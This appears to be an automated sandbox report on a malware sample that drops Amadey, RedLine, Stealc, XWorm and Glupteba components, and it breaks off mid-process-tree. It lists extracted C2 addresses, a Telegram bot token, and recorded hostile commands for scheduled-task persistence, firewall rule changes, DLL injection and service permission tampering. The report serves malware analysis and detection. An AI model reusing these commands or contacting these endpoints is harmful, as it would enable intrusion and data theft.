Overview

overview

10

Static

static

3

cryptolaemus

windows10-2004-x64

10

cryptolaemus

windows11-21h2-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-04-2024 17:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe

  • Size

    1.8MB

  • MD5

    998693d9eec95c25eb49b2bef57031af

  • SHA1

    46bc7b8d0bf5fb187abc1037ca8593d70f1100f6

  • SHA256

    c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54

  • SHA512

    56db5bd7f0698492bf829b55d088d1581ea8cf809e26ec792daaf85a5a4946531b51e0935fa9b6bbc3a390e8e7f078f5d7ed7b0eccc9ef1bda4091688646a838

  • SSDEEP

    49152:60X38PlXdE0fyCZ7P5xwzwm+XtT0Pz2BLrATSzT0cPbD:6q2E0fyCVP5zdwr2ZscjD

Score
10/10
amadeygluptebaredlinestealcxwormzgrat@cloudytteamtest1234discoverydropperevasioninfostealerloaderpersistenceratrootkitspywarestealerthemidatrojan

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

Test1234

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://52.143.157.84

http://185.172.128.150
Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:7000

91.92.252.220:7000

41.199.23.195:7000

saveclinetsforme68465454711991.publicvm.com:7000
Mutex

bBT8anvIxhxDFmkf

Attributes
  • Install_directory

    %AppData%

  • install_file

    explorer.exe

  • telegram

    https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Detect Xworm Payload 2 IoCs
  • Detect ZGRat V1 3 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 9 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
    evasion
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
    evasion
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 22 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Registers COM server for autorun 1 TTPs 14 IoCs
    persistence
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 27 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 50 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 31 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe
    "C:\Users\Admin\AppData\Local\Temp\c52131b463fc8b9c9f35a53dc8f396f478041b54a6d89dd3c60047ad9a36df54.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:1380
  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
      "C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:4848
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 884
          3⤵
          • Program crash
          PID:4456
      • C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
        "C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2992
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3712
          • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1348
          • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:804
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
            4⤵
              PID:3356
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                5⤵
                  PID:5024
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 392
              3⤵
              • Program crash
              PID:2308
          • C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2528
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
                PID:4036
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                3⤵
                  PID:3920
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  3⤵
                    PID:3816
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    3⤵
                      PID:1492
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 412
                      3⤵
                      • Program crash
                      PID:3560
                  • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4656
                    • C:\Windows\SysWOW64\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
                      3⤵
                      • Creates scheduled task(s)
                      PID:3444
                  • C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:572
                  • C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of WriteProcessMemory
                    PID:4564
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      3⤵
                      • Checks processor information in registry
                      PID:3564
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 1344
                        4⤵
                        • Program crash
                        PID:2916
                  • C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:1936
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4472
                      • C:\Users\Admin\Pictures\Cjwclzs0EungII7uFfbPEY2H.exe
                        "C:\Users\Admin\Pictures\Cjwclzs0EungII7uFfbPEY2H.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:3868
                        • C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe
                          "C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks processor information in registry
                          PID:1096
                        • C:\Users\Admin\AppData\Local\Temp\u2zg.2\run.exe
                          "C:\Users\Admin\AppData\Local\Temp\u2zg.2\run.exe"
                          5⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:1272
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\SysWOW64\cmd.exe
                            6⤵
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            PID:2228
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              7⤵
                                PID:5808
                          • C:\Users\Admin\AppData\Local\Temp\u2zg.3.exe
                            "C:\Users\Admin\AppData\Local\Temp\u2zg.3.exe"
                            5⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:4480
                            • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                              "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                              6⤵
                                PID:5256
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1664
                              5⤵
                              • Program crash
                              PID:4560
                          • C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe
                            "C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:836
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3468
                            • C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe
                              "C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe"
                              5⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Checks for VirtualBox DLLs, possible anti-VM trick
                              • Drops file in Windows directory
                              • Modifies data under HKEY_USERS
                              PID:244
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                6⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:488
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                6⤵
                                  PID:4852
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                    7⤵
                                    • Modifies Windows Firewall
                                    PID:5380
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                  • Drops file in System32 directory
                                  PID:5452
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  PID:5456
                                • C:\Windows\rss\csrss.exe
                                  C:\Windows\rss\csrss.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Manipulates WinMonFS driver.
                                  • Drops file in Windows directory
                                  PID:2952
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    7⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    PID:5632
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                    7⤵
                                    • Creates scheduled task(s)
                                    PID:4732
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      8⤵
                                        PID:1396
                                    • C:\Windows\SYSTEM32\schtasks.exe
                                      schtasks /delete /tn ScheduledUpdate /f
                                      7⤵
                                        PID:2096
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          8⤵
                                            PID:4452
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          7⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          PID:3220
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          7⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          PID:6024
                                        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                          7⤵
                                          • Executes dropped EXE
                                          PID:3220
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:4688
                                        • C:\Windows\windefender.exe
                                          "C:\Windows\windefender.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4204
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                            8⤵
                                              PID:5368
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                9⤵
                                                • Launches sc.exe
                                                PID:5712
                                    • C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe
                                      "C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3672
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        5⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3368
                                      • C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe
                                        "C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Checks for VirtualBox DLLs, possible anti-VM trick
                                        • Drops file in Windows directory
                                        PID:1348
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -nologo -noprofile
                                          6⤵
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3540
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                          6⤵
                                            PID:5304
                                            • C:\Windows\system32\netsh.exe
                                              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                              7⤵
                                              • Modifies Windows Firewall
                                              PID:2096
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            6⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:5624
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            6⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:6064
                                      • C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe
                                        "C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe" --silent --allusers=0
                                        4⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        PID:4900
                                        • C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe
                                          C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6a99e1d0,0x6a99e1dc,0x6a99e1e8
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:2860
                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\j8F8cQWmBXz0EcdH8M6kRmwS.exe
                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\j8F8cQWmBXz0EcdH8M6kRmwS.exe" --version
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1020
                                        • C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe
                                          "C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4900 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428170222" --session-guid=03c3f69b-da01-405d-894b-c080b48c9c23 --server-tracking-blob="NzM4ODk4YmI5NDRjZWYwNTU5ZDU5MjRjMzEwYTcxZDdkOWFlZTA4MThjMDUwYWRhZWE1MGI1MTJlYjA5NjUzZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzIzNzM3Ljc1NjYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYjc5MTFmNGQtODE0Ny00ODFmLWEwOWUtZTI0ODMyMjFkZDY4In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C04000000000000
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Enumerates connected drives
                                          PID:5032
                                          • C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe
                                            C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x69fbe1d0,0x69fbe1dc,0x69fbe1e8
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5024
                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:5820
                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe
                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe" --version
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:5060
                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xa76038,0xa76044,0xa76050
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:5236
                                      • C:\Users\Admin\Pictures\AUWFjIOuq4vJkCnAMCpu3BX3.exe
                                        "C:\Users\Admin\Pictures\AUWFjIOuq4vJkCnAMCpu3BX3.exe"
                                        4⤵
                                        • Executes dropped EXE
                                        PID:4072
                                        • C:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exe
                                          .\Install.exe /WkfdidVYT "385118" /S
                                          5⤵
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Enumerates system info in registry
                                          PID:3992
                                          • C:\Windows\SysWOW64\cmd.exe
